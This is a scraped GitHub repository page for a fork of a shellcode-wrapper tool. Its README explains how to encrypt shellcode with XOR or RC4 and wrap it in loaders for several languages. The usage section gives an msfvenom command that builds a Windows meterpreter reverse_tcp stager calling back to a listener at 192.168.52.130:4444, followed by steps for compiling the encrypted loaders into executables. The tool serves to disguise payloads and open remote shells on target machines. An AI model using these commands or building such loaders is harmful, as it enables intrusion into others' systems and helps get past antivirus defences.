Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

Shellcode wrapper with encryption for multiple target languages

Notifications You must be signed in to change notification settings

mohammadalmosa/ShellcodeWrapperModify

Open more actions menu
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
13 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Mutlibyte XOR or RC4 encrypted shellcode - Can run in Python3

Modify: Ch1ng

The technique uses two kind of code file:

  1. The shellcode encoder/encrypter: shellcode_encoder.py
  2. Various shellcode wrapper, in C++, C#, Binary and Python:
    • encryptedShellcodeWrapper.cpp - only supports XOR encryption
    • encryptedShellcodeWrapper.go - only supports XOR encryption
    • encryptedShellcodeWrapper.cs - supports both XOR and RC4 encryption
    • encryptedShellcodeWrapper.py - supports both XOR and RC4 encryption
    • encryptedShellcodeWrapper.bin - supports both XOR and RC4 encryption

Installation

Installation is straight forward:

  • Git clone this repository: git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper
  • cd into the ShellcodeWrapper folder: cd ShellcodeWrapper
  • Install requirements using pip install -r requirements.txt
  • Give the execution rights to the main script: chmod +x shellcode_encoder.py

Usage

First, you need to obtain a usable shellcode from metasploit (run it from a Kali distribution), for example:

root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw

In this example, the output is a raw (unencoded & unencrypted) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (payload and parameters).

Second, run the shellcode_encoder.py script along with the desired arguments:

  • raw shellcode filename
  • encryption key
  • encryption type: xor or rc4
  • desired output: base64, cpp, csharp, python, binary, go

For instance, to xor encrypt the shellcode with the key 'thisismykey' and get an output code file in C#, C++, Go, Binary and Python:

root@kali:~# ./shellcode_encoder.py -cpp -cs -py -bin -go shellcode.raw xor

This will generate C#, C++, Go, Binary and Python code file in the result folder. Those files are ready to use/compile.

Eventually:

  1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for Win32 console application and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).
  2. For the C# wrapper, compile the C# code file into a Windows executable: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs
  3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable

About

Shellcode wrapper with encryption for multiple target languages

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 57.4%
  • C# 23.0%
  • C++ 10.8%
  • Go 8.8%
Morty Proxy This is a proxified and sanitized view of the page, visit original site.